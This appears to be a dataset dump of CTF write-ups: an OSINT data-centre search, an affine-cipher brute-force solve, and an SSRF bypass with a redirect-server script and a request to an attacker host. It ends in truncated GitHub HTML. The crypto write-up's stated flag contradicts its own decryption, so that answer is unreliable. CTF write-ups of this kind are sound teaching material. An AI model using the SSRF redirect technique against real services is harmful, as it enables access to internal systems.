text_chunk
stringlengths 151
703k
|
|---|
Google Search : 45259 Datacenter Search result ：https://www.datacenters.com/amazon-aws-aws-45259-sterlingposition: 45259 west severn way, sterling, va, usa
Submit. Not amazon Search geographical position: 45259 west severn way, sterling, va, usaSearch result ：（The First Page）https://www.datacenterknowledge.com/archives/2017/03/08/n-virginia-landgrab-continues-next-amazon-data-center-campus
One of the paragraphs：**Corporate Office Property Trust**, a publicly traded REIT that's built a lot of shell buildings for Amazon data centers in the region, appears to be in the process of entitling land for another data center campus. Northern Virginia is home to the largest cluster of Amazon Web Services data centers. |
The attachment contains the following files:
```consoleunzip -l mfine.zipArchive: mfine.zip Length Date Time Name--------- ---------- ----- ---- 539 11-17-2021 13:17 chal.py 630 11-17-2021 13:16 cipher.txt--------- ------- 1169 2 files```
The `chal.py` file contains the following simple encryption code:
```pythonimport random
def encrypt(plaintext): ciphertext = '' for letter in plaintext: i = ALPHA.index(letter) c = (a*i + b) % m ciphertext += ALPHA[c] return ciphertext
ALPHA = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ{}_ #"m = len(ALPHA)a = random.randrange(1, m)b = random.randrange(1, m)
message = open("message.txt").read().replace('\n', '')cipher = encrypt(message)
with open("cipher.txt", 'w') as f: for i in range(0,len(cipher),64): f.write( cipher[i:i+64]+'\n' )```
It basically implements the [Affine Cipher](https://en.wikipedia.org/wiki/Affine_cipher). Thecharacter set length is 41.
```python
In [163]: len("0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ{}_ #")Out[163]: 41```
This means the total number of possible keys is 1681 and is feasibly bruteforceable.
```pythonIn [164]: pow(41, 2)Out[164]: 1681```
The `cipher.txt` file contains the encrypted message that we have to decrypt:
```RVWA6IIHTWAJH1VWEAH0A6AR 1WAFIA2FTF6G1V6XWRHJA0DX0RHRDRHFTAJH1VWEAQVWEWAW6JVAGWRRWEAHTA6TA6G1V6XWRAH0A2611W5ARFAHR0ATD2WEHJAWSDH#6GWTRAWTJE 1RW5AD0HT4A6A0H21GWA26RVW26RHJ6GAIDTJRHFTA6T5AJFT#WERW5AX6JUARFA6AGWRRWEARVWAIG64AIFEA FDAH0A#DGTJFTBM#ME RV9T4OJ8TOXMOXENUMTO9IO NDO6EMOZ28EROMTND4V_ARVWAIFE2DG6AD0W5A2W6T0ARV6RAW6JVAGWRRWEAWTJE 1R0ARFAFTWAFRVWEAGWRRWEA6T5AX6JUA646HTA2W6THT4ARVWAJH1VWEAH0AW00WTRH6GG A6A0R6T56E5A0DX0RHRDRHFTAJH1VWEAQHRVA6AEDGWA4F#WETHT4AQVHJVAGWRRWEA4FW0ARFAQVHJVA0HTJWARVWA6IIHTWAJH1VWEAH0A0RHGGA6A2FTF6G1V6XWRHJA0DX0RHRDRHFTAJH1VWEAHRAHTVWEHR0ARVWAQW6UTW00W0AFIARV6RAJG600AFIAJH1VWE0```
The solver script to this is given as follows:
```python#!/usr/bin/env python# Requires python 3.8+
import itertools
ALPHA = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ{}_ #"m = len(ALPHA)
def encrypt(plaintext, a, b): ciphertext = '' for letter in plaintext: i = ALPHA.index(letter) c = (a*i + b) % m ciphertext += ALPHA[c] return ciphertext
def decrypt(ciphertext, a, b): plaintext = '' inv = pow(a, -1, m) for letter in ciphertext: i = ALPHA.index(letter) p = ((i - b) * inv) % m plaintext += ALPHA[p] return plaintext
def main(): ciphertext = open("cipher.txt").read().replace('\n', '') print('Ciphertext: {}'.format(ciphertext)) possible_decrypts = [] for a, b in itertools.product(range(1, m), range(1, m)): plaintext = decrypt(ciphertext, a, b) print('Key ({}, {}): {}'.format(a, b, plaintext)) if 'flag' in plaintext.lower(): possible_decrypts.append((a, b, plaintext))
print("\nPossible Decryptions:\n") for a, b, plaintext in possible_decrypts: print('Key ({}, {}): {}'.format(a, b, plaintext))
if __name__ == '__main__': main()```
Running the script gives us the following output:
```console$ python exploit.pyCiphertext: RVWA6IIHTWAJH1VWEAH0A6AR 1WAFIA2FTF6G1V6XWRHJA0DX0RHRDRHFTAJH1VWEAQVWEWAW6JVAGWRRWEAHTA6TA6G1V6XWRAH0A2611W5ARFAHR0ATD2WEHJAWSDH#6GWTRAWTJE 1RW5AD0HT4A6A0H21GWA26RVW26RHJ6GAIDTJRHFTA6T5AJFT#WERW5AX6JUARFA6AGWRRWEARVWAIG64AIFEA FDAH0A#DGTJFTBM#ME RV9T4OJ8TOXMOXENUMTO9IO NDO6EMOZ28EROMTND4V_ARVWAIFE2DG6AD0W5A2W6T0ARV6RAW6JVAGWRRWEAWTJE 1R0ARFAFTWAFRVWEAGWRRWEA6T5AX6JUA646HTA2W6THT4ARVWAJH1VWEAH0AW00WTRH6GG A6A0R6T56E5A0DX0RHRDRHFTAJH1VWEAQHRVA6AEDGWA4F#WETHT4AQVHJVAGWRRWEA4FW0ARFAQVHJVA0HTJWARVWA6IIHTWAJH1VWEAH0A0RHGGA6A2FTF6G1V6XWRHJA0DX0RHRDRHFTAJH1VWEAHRAHTVWEHR0ARVWAQW6UTW00W0AFIARV6RAJG600AFIAJH1VWE0Key (1, 1): QUV95HHGSV9IG0UVD9G#959Q_0V9EH91ESE5F0U5WVQGI9#CW#QGQCQGES9IG0UVD9PUVDV9V5IU9FVQQVD9GS95S95F0U5WVQ9G#91500V49QE9GQ#9SC1VDGI9VRCG 5FVSQ9VSID_0QV49C#GS3959#G10FV915QUV15QGI5F9HCSIQGES95S49IES VDQV49W5IT9QE959FVQQVD9QUV9HF539HED9_EC9G#9 CFSIESAL LD_QU8S3NI7SNWLNWDMTLSN8HN_MCN5DLNY17DQNLSMC3U}9QUV9HED1CF59C#V491V5S#9QU5Q9V5IU9FVQQVD9VSID_0Q#9QE9ESV9EQUVD9FVQQVD95S49W5IT9535GS91V5SGS39QUV9IG0UVD9G#9V##VSQG5FF_959#Q5S45D49#CW#QGQCQGES9IG0UVD9PGQU959DCFV93E VDSGS39PUGIU9FVQQVD93EV#9QE9PUGIU9#GSIV9QUV95HHGSV9IG0UVD9G#9#QGFF9591ESE5F0U5WVQGI9#CW#QGQCQGES9IG0UVD9GQ9GSUVDGQ#9QUV9PV5TSV##V#9EH9QU5Q9IF5##9EH9IG0UVD#Key (1, 2): PTU84GGFRU8HF#TUC8F 848P}#U8DG80DRD4E#T4VUPFH8 BV PFPBPFDR8HF#TUC8OTUCU8U4HT8EUPPUC8FR84R84E#T4VUP8F 804##U38PD8FP 8RB0UCFH8UQBF_4EURP8URHC}#PU38B FR2848 F0#EU804PTU04PFH4E8GBRHPFDR84R38HDR_UCPU38V4HS8PD848EUPPUC8PTU8GE428GDC8}DB8F 8_BERHDR9K_KC}PT7R2MH6RMVKMVCLSKRM7GM}LBM4CKMX06CPMKRLB2T{8PTU8GDC0BE48B U380U4R 8PT4P8U4HT8EUPPUC8URHC}#P 8PD8DRU8DPTUC8EUPPUC84R38V4HS8424FR80U4RFR28PTU8HF#TUC8F 8U URPF4EE}848 P4R34C38 BV PFPBPFDR8HF#TUC8OFPT848CBEU82D_UCRFR28OTFHT8EUPPUC82DU 8PD8OTFHT8 FRHU8PTU84GGFRU8HF#TUC8F 8 PFEE8480DRD4E#T4VUPFH8 BV PFPBPFDR8HF#TUC8FP8FRTUCFP 8PTU8OU4SRU U 8DG8PT4P8HE4 8DG8HF#TUCKey (1, 3): OST73FFEQT7GE STB7E_737O{ T7CF7#CQC3D S3UTOEG7_AU_OEOAOECQ7GE STB7NSTBT7T3GS7DTOOTB7EQ73Q73D S3UTO7E_7#3 T27OC7EO_7QA#TBEG7TPAE}3DTQO7TQGB{ OT27A_EQ1737_E# DT7#3OST#3OEG3D7FAQGOECQ73Q27GCQ}TBOT27U3GR7OC737DTOOTB7OST7FD317FCB7{CA7E_7}ADQGCQ8J}JB{OS6Q1LG5QLUJLUBKRJQL6FL{KAL3BJLW#5BOLJQKA1SZ7OST7FCB#AD37A_T27#T3Q_7OS3O7T3GS7DTOOTB7TQGB{ O_7OC7CQT7COSTB7DTOOTB73Q27U3GR7313EQ7#T3QEQ17OST7GE STB7E_7T__TQOE3DD{737_O3Q23B27_AU_OEOAOECQ7GE STB7NEOS737BADT71C}TBQEQ17NSEGS7DTOOTB71CT_7OC7NSEGS7_EQGT7OST73FFEQT7GE STB7E_7_OEDD737#CQC3D S3UTOEG7_AU_OEOAOECQ7GE STB7EO7EQSTBEO_7OST7NT3RQT__T_7CF7OS3O7GD3__7CF7GE STB_Key (1, 4): NRS62EEDPS6FD_RSA6D}626NZ_S6BE6 BPB2C_R2TSNDF6}9T}NDN9NDBP6FD_RSA6MRSAS6S2FR6CSNNSA6DP62P62C_R2TSN6D}6 2__S16NB6DN}6P9 SADF6SO9D{2CSPN6SPFAZ_NS169}DP0626}D _CS6 2NRS 2NDF2C6E9PFNDBP62P16FBP{SANS16T2FQ6NB626CSNNSA6NRS6EC206EBA6ZB96D}6{9CPFBP7I{IAZNR5P0KF4PKTIKTAJQIPK5EKZJ9K2AIKV 4ANKIPJ90RY6NRS6EBA 9C269}S16 S2P}6NR2N6S2FR6CSNNSA6SPFAZ_N}6NB6BPS6BNRSA6CSNNSA62P16T2FQ6202DP6 S2PDP06NRS6FD_RSA6D}6S}}SPND2CCZ626}N2P12A16}9T}NDN9NDBP6FD_RSA6MDNR626A9CS60B{SAPDP06MRDFR6CSNNSA60BS}6NB6MRDFR6}DPFS6NRS62EEDPS6FD_RSA6D}6}NDCC626 BPB2C_R2TSNDF6}9T}NDN9NDBP6FD_RSA6DN6DPRSADN}6NRS6MS2QPS}}S}6BE6NR2N6FC2}}6BE6FD_RSA}...Possible Decryptions:
Key (27, 23): THE AFFINE CIPHER IS A TYPE OF MONOALPHABETIC SUBSTITUTION CIPHER WHERE EACH LETTER IN AN ALPHABET IS MAPPED TO ITS NUMERIC EQUIVALENT ENCRYPTED USING A SIMPLE MATHEMATICAL FUNCTION AND CONVERTED BACK TO A LETTER THE FLAG FOR YOU IS VULNCON{3V3RYTH1NG_C4N_B3_BR0K3N_1F_Y0U_AR3_5M4RT_3N0UGH} THE FORMULA USED MEANS THAT EACH LETTER ENCRYPTS TO ONE OTHER LETTER AND BACK AGAIN MEANING THE CIPHER IS ESSENTIALLY A STANDARD SUBSTITUTION CIPHER WITH A RULE GOVERNING WHICH LETTER GOES TO WHICH SINCE THE AFFINE CIPHER IS STILL A MONOALPHABETIC SUBSTITUTION CIPHER IT INHERITS THE WEAKNESSES OF THAT CLASS OF CIPHERS```
**Flag:** `VULNCON{g00d_luck_4nd_Have_fun}` |
This challenge involved a website that allowed users to specify a URL to render as a PDF. Thisessential acts as a way to perform SSRF. However, any address such as `127.0.0.1` or other encodedforms are rejected.
To get around this, we simply use redirect headers on our own server. I simply reused this [code snippet](https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery#bypass-via-redirect):
```python#!/usr/bin/env python3
#python3 ./redirector.py 8000 http://127.0.0.1/
import sysfrom http.server import HTTPServer, BaseHTTPRequestHandler
if len(sys.argv)-1 != 2: print("Usage: {} <port_number> <url>".format(sys.argv[0])) sys.exit()
class Redirect(BaseHTTPRequestHandler): def do_GET(self): self.send_response(302) self.send_header('Location', sys.argv[2]) self.end_headers()
HTTPServer(("", int(sys.argv[1])), Redirect).serve_forever()```
This was invoked with `python redirector.py 80 http://127.0.0.1`.
The following request was sent to the challenge server to trigger the redirect to localhost.
```POST /convert HTTP/1.1Host: 143.244.132.186:3000User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedContent-Length: 29Origin: http://143.244.132.186:3000Connection: closeReferer: http://143.244.132.186:3000/Upgrade-Insecure-Requests: 1
target=http://attacker.sg.pwn
```
The resultant PDF document that gets rendered contains:
```Welcome back to home admin! Here is your Flag: VULNCON{W3lc0me_b4ck_t0_h0m3}```
**Flag:** `VULNCON{W3lc0me_b4ck_t0_h0m3}` |
<html lang="en" data-color-mode="auto" data-light-theme="light" data-dark-theme="dark" data-a11y-animated-images="system"> <head> <meta charset="utf-8"> <link rel="dns-prefetch" href="https://github.githubassets.com"> <link rel="dns-prefetch" href="https://avatars.githubusercontent.com"> <link rel="dns-prefetch" href="https://github-cloud.s3.amazonaws.com"> <link rel="dns-prefetch" href="https://user-images.githubusercontent.com/"> <link rel="preconnect" href="https://github.githubassets.com" crossorigin> <link rel="preconnect" href="https://avatars.githubusercontent.com">
<link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/light-fe3f886b577a.css" /><link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/dark-a1dbeda2886c.css" /><link data-color-theme="dark_dimmed" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/dark_dimmed-1ad5cf51dfeb.css" /><link data-color-theme="dark_high_contrast" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/dark_high_contrast-11d3505dc06a.css" /><link data-color-theme="dark_colorblind" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/dark_colorblind-8b800495504f.css" /><link data-color-theme="light_colorblind" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/light_colorblind-daa38c88b795.css" /><link data-color-theme="light_high_contrast" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/light_high_contrast-1b9ea565820a.css" /><link data-color-theme="light_tritanopia" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/light_tritanopia-e4be9332dd6c.css" /><link data-color-theme="dark_tritanopia" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/dark_tritanopia-0dcf95848dd5.css" /> <link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/primer-c581c4e461bb.css" /> <link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/global-0e278d45156f.css" /> <link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/github-dcaf0f44dbb1.css" /> <link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/code-26709f54a08d.css" />
<meta name="optimizely-datafile" content="{"groups": [], "environmentKey": "production", "rollouts": [], "typedAudiences": [], "projectId": "16737760170", "variables": [], "featureFlags": [], "experiments": [], "version": "4", "audiences": [{"conditions": "[\"or\", {\"match\": \"exact\", \"name\": \"$opt_dummy_attribute\", \"type\": \"custom_attribute\", \"value\": \"$opt_dummy_value\"}]", "id": "$opt_dummy_audience", "name": "Optimizely-Generated Audience for Backwards Compatibility"}], "anonymizeIP": true, "sdkKey": "WTc6awnGuYDdG98CYRban", "attributes": [{"id": "16822470375", "key": "user_id"}, {"id": "17143601254", "key": "spammy"}, {"id": "18175660309", "key": "organization_plan"}, {"id": "18813001570", "key": "is_logged_in"}, {"id": "19073851829", "key": "geo"}, {"id": "20175462351", "key": "requestedCurrency"}, {"id": "20785470195", "key": "country_code"}, {"id": "21656311196", "key": "opened_downgrade_dialog"}], "botFiltering": false, "accountId": "16737760170", "events": [{"experimentIds": [], "id": "17911811441", "key": "hydro_click.dashboard.teacher_toolbox_cta"}, {"experimentIds": [], "id": "18124116703", "key": "submit.organizations.complete_sign_up"}, {"experimentIds": [], "id": "18145892387", "key": "no_metric.tracked_outside_of_optimizely"}, {"experimentIds": [], "id": "18178755568", "key": "click.org_onboarding_checklist.add_repo"}, {"experimentIds": [], "id": "18180553241", "key": "submit.repository_imports.create"}, {"experimentIds": [], "id": "18186103728", "key": "click.help.learn_more_about_repository_creation"}, {"experimentIds": [], "id": "18188530140", "key": "test_event"}, {"experimentIds": [], "id": "18191963644", "key": "click.empty_org_repo_cta.transfer_repository"}, {"experimentIds": [], "id": "18195612788", "key": "click.empty_org_repo_cta.import_repository"}, {"experimentIds": [], "id": "18210945499", "key": "click.org_onboarding_checklist.invite_members"}, {"experimentIds": [], "id": "18211063248", "key": "click.empty_org_repo_cta.create_repository"}, {"experimentIds": [], "id": "18215721889", "key": "click.org_onboarding_checklist.update_profile"}, {"experimentIds": [], "id": "18224360785", "key": "click.org_onboarding_checklist.dismiss"}, {"experimentIds": [], "id": "18234832286", "key": "submit.organization_activation.complete"}, {"experimentIds": [], "id": "18252392383", "key": "submit.org_repository.create"}, {"experimentIds": [], "id": "18257551537", "key": "submit.org_member_invitation.create"}, {"experimentIds": [], "id": "18259522260", "key": "submit.organization_profile.update"}, {"experimentIds": [], "id": "18564603625", "key": "view.classroom_select_organization"}, {"experimentIds": [], "id": "18568612016", "key": "click.classroom_sign_in_click"}, {"experimentIds": [], "id": "18572592540", "key": "view.classroom_name"}, {"experimentIds": [], "id": "18574203855", "key": "click.classroom_create_organization"}, {"experimentIds": [], "id": "18582053415", "key": "click.classroom_select_organization"}, {"experimentIds": [], "id": "18589463420", "key": "click.classroom_create_classroom"}, {"experimentIds": [], "id": "18591323364", "key": "click.classroom_create_first_classroom"}, {"experimentIds": [], "id": "18591652321", "key": "click.classroom_grant_access"}, {"experimentIds": [], "id": "18607131425", "key": "view.classroom_creation"}, {"experimentIds": [], "id": "18831680583", "key": "upgrade_account_plan"}, {"experimentIds": [], "id": "19064064515", "key": "click.signup"}, {"experimentIds": [], "id": "19075373687", "key": "click.view_account_billing_page"}, {"experimentIds": [], "id": "19077355841", "key": "click.dismiss_signup_prompt"}, {"experimentIds": [], "id": "19079713938", "key": "click.contact_sales"}, {"experimentIds": [], "id": "19120963070", "key": "click.compare_account_plans"}, {"experimentIds": [], "id": "19151690317", "key": "click.upgrade_account_cta"}, {"experimentIds": [], "id": "19424193129", "key": "click.open_account_switcher"}, {"experimentIds": [], "id": "19520330825", "key": "click.visit_account_profile"}, {"experimentIds": [], "id": "19540970635", "key": "click.switch_account_context"}, {"experimentIds": [], "id": "19730198868", "key": "submit.homepage_signup"}, {"experimentIds": [], "id": "19820830627", "key": "click.homepage_signup"}, {"experimentIds": [], "id": "19988571001", "key": "click.create_enterprise_trial"}, {"experimentIds": [], "id": "20036538294", "key": "click.create_organization_team"}, {"experimentIds": [], "id": "20040653299", "key": "click.input_enterprise_trial_form"}, {"experimentIds": [], "id": "20062030003", "key": "click.continue_with_team"}, {"experimentIds": [], "id": "20068947153", "key": "click.create_organization_free"}, {"experimentIds": [], "id": "20086636658", "key": "click.signup_continue.username"}, {"experimentIds": [], "id": "20091648988", "key": "click.signup_continue.create_account"}, {"experimentIds": [], "id": "20103637615", "key": "click.signup_continue.email"}, {"experimentIds": [], "id": "20111574253", "key": "click.signup_continue.password"}, {"experimentIds": [], "id": "20120044111", "key": "view.pricing_page"}, {"experimentIds": [], "id": "20152062109", "key": "submit.create_account"}, {"experimentIds": [], "id": "20165800992", "key": "submit.upgrade_payment_form"}, {"experimentIds": [], "id": "20171520319", "key": "submit.create_organization"}, {"experimentIds": [], "id": "20222645674", "key": "click.recommended_plan_in_signup.discuss_your_needs"}, {"experimentIds": [], "id": "20227443657", "key": "submit.verify_primary_user_email"}, {"experimentIds": [], "id": "20234607160", "key": "click.recommended_plan_in_signup.try_enterprise"}, {"experimentIds": [], "id": "20238175784", "key": "click.recommended_plan_in_signup.team"}, {"experimentIds": [], "id": "20239847212", "key": "click.recommended_plan_in_signup.continue_free"}, {"experimentIds": [], "id": "20251097193", "key": "recommended_plan"}, {"experimentIds": [], "id": "20438619534", "key": "click.pricing_calculator.1_member"}, {"experimentIds": [], "id": "20456699683", "key": "click.pricing_calculator.15_members"}, {"experimentIds": [], "id": "20467868331", "key": "click.pricing_calculator.10_members"}, {"experimentIds": [], "id": "20476267432", "key": "click.trial_days_remaining"}, {"experimentIds": [], "id": "20476357660", "key": "click.discover_feature"}, {"experimentIds": [], "id": "20479287901", "key": "click.pricing_calculator.custom_members"}, {"experimentIds": [], "id": "20481107083", "key": "click.recommended_plan_in_signup.apply_teacher_benefits"}, {"experimentIds": [], "id": "20483089392", "key": "click.pricing_calculator.5_members"}, {"experimentIds": [], "id": "20484283944", "key": "click.onboarding_task"}, {"experimentIds": [], "id": "20484996281", "key": "click.recommended_plan_in_signup.apply_student_benefits"}, {"experimentIds": [], "id": "20486713726", "key": "click.onboarding_task_breadcrumb"}, {"experimentIds": [], "id": "20490791319", "key": "click.upgrade_to_enterprise"}, {"experimentIds": [], "id": "20491786766", "key": "click.talk_to_us"}, {"experimentIds": [], "id": "20494144087", "key": "click.dismiss_enterprise_trial"}, {"experimentIds": [], "id": "20499722759", "key": "completed_all_tasks"}, {"experimentIds": [], "id": "20500710104", "key": "completed_onboarding_tasks"}, {"experimentIds": [], "id": "20513160672", "key": "click.read_doc"}, {"experimentIds": [], "id": "20516196762", "key": "actions_enabled"}, {"experimentIds": [], "id": "20518980986", "key": "click.dismiss_trial_banner"}, {"experimentIds": [], "id": "20535446721", "key": "click.issue_actions_prompt.dismiss_prompt"}, {"experimentIds": [], "id": "20557002247", "key": "click.issue_actions_prompt.setup_workflow"}, {"experimentIds": [], "id": "20595070227", "key": "click.pull_request_setup_workflow"}, {"experimentIds": [], "id": "20626600314", "key": "click.seats_input"}, {"experimentIds": [], "id": "20642310305", "key": "click.decrease_seats_number"}, {"experimentIds": [], "id": "20662990045", "key": "click.increase_seats_number"}, {"experimentIds": [], "id": "20679620969", "key": "click.public_product_roadmap"}, {"experimentIds": [], "id": "20761240940", "key": "click.dismiss_survey_banner"}, {"experimentIds": [], "id": "20767210721", "key": "click.take_survey"}, {"experimentIds": [], "id": "20795281201", "key": "click.archive_list"}, {"experimentIds": [], "id": "20966790249", "key": "contact_sales.submit"}, {"experimentIds": [], "id": "20996500333", "key": "contact_sales.existing_customer"}, {"experimentIds": [], "id": "20996890162", "key": "contact_sales.blank_message_field"}, {"experimentIds": [], "id": "21000470317", "key": "contact_sales.personal_email"}, {"experimentIds": [], "id": "21002790172", "key": "contact_sales.blank_phone_field"}, {"experimentIds": [], "id": "21354412592", "key": "click.dismiss_create_readme"}, {"experimentIds": [], "id": "21366102546", "key": "click.dismiss_zero_user_content"}, {"experimentIds": [], "id": "21370252505", "key": "account_did_downgrade"}, {"experimentIds": [], "id": "21370840408", "key": "click.cta_create_readme"}, {"experimentIds": [], "id": "21375451068", "key": "click.cta_create_new_repository"}, {"experimentIds": [], "id": "21385390948", "key": "click.zero_user_content"}, {"experimentIds": [], "id": "21467712175", "key": "click.downgrade_keep"}, {"experimentIds": [], "id": "21484112202", "key": "click.downgrade"}, {"experimentIds": [], "id": "21495292213", "key": "click.downgrade_survey_exit"}, {"experimentIds": [], "id": "21508241468", "key": "click.downgrade_survey_submit"}, {"experimentIds": [], "id": "21512030356", "key": "click.downgrade_support"}, {"experimentIds": [], "id": "21539090022", "key": "click.downgrade_exit"}, {"experimentIds": [], "id": "21543640644", "key": "click_fetch_upstream"}, {"experimentIds": [], "id": "21646510300", "key": "click.move_your_work"}, {"experimentIds": [], "id": "21656151116", "key": "click.add_branch_protection_rule"}, {"experimentIds": [], "id": "21663860599", "key": "click.downgrade_dialog_open"}, {"experimentIds": [], "id": "21687860483", "key": "click.learn_about_protected_branches"}, {"experimentIds": [], "id": "21689050333", "key": "click.dismiss_protect_this_branch"}, {"experimentIds": [], "id": "21864370109", "key": "click.sign_in"}], "revision": "1372"}" />
<script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/wp-runtime-774bfe5ae983.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_stacktrace-parser_dist_stack-trace-parser_esm_js-node_modules_github_bro-327bbf-0aaeb22dd2a5.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/ui_packages_soft-nav_soft-nav_ts-21fc7a4a0e8f.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/environment-e059fd03252f.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_selector-observer_dist_index_esm_js-2646a2c533e3.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_delegated-events_dist_index_js-node_modules_github_details-dialog-elemen-63debe-c04540d458d4.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_relative-time-element_dist_index_js-b9368a9cb79e.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_fzy_js_index_js-node_modules_github_markdown-toolbar-element_dist_index_js-e3de700a4c9d.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_auto-complete-element_dist_index_js-node_modules_github_catalyst_-6afc16-e779583c369f.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_file-attachment-element_dist_index_js-node_modules_github_text-ex-3415a8-7ecc10fb88d0.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_filter-input-element_dist_index_js-node_modules_github_remote-inp-79182d-befd2b2f5880.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_primer_view-components_app_components_primer_primer_js-node_modules_gith-6a1af4-df3bc95b06d3.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/github-elements-fc0e0b89822a.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/element-registry-1641411db24a.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_lit-html_lit-html_js-9d9fe1859ce5.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_manuelpuyol_turbo_dist_turbo_es2017-esm_js-4140d67f0cc2.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_mini-throttle_dist_index_js-node_modules_github_alive-client_dist-bf5aa2-424aa982deef.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_primer_behaviors_dist_esm_dimensions_js-node_modules_github_hotkey_dist_-9fc4f4-d434ddaf3207.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_color-convert_index_js-35b3ae68c408.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_remote-form_dist_index_js-node_modules_github_session-resume_dist-def857-2a32d97c93c5.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_paste-markdown_dist_index_esm_js-node_modules_github_quote-select-15ddcc-1512e06cfee0.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_updatable-content_ts-430cacb5f7df.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_behaviors_keyboard-shortcuts-helper_ts-app_assets_modules_github_be-f5afdb-8dd5f026c5b9.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_sticky-scroll-into-view_ts-0af96d15a250.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_behaviors_include-fragment_ts-app_assets_modules_github_behaviors_r-4077b4-75370d1c1705.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_behaviors_commenting_edit_ts-app_assets_modules_github_behaviors_ht-83c235-7883159efa9e.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/behaviors-742151da9690.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_delegated-events_dist_index_js-node_modules_github_catalyst_lib_index_js-06ff531-32d7d1e94817.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/notifications-global-f5b58d24780b.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_optimizely_optimizely-sdk_dist_optimizely_browser_es_min_js-node_modules-3f2a9e-65eee21d1482.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/optimizely-26cee11e2e10.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_morphdom_dist_morphdom-esm_js-node_modules_github_template-parts_lib_index_js-58417dae193c.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_virtualized-list_es_index_js-node_modules_github_memoize_dist_esm_index_js-8496b7c4b809.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_filter-input-element_dist_index_js-node_modules_github_mini-throt-a33094-b03defd3289b.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_file-attachment-element_dist_index_js-node_modules_github_mini-th-85225b-226fc85f9b72.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" 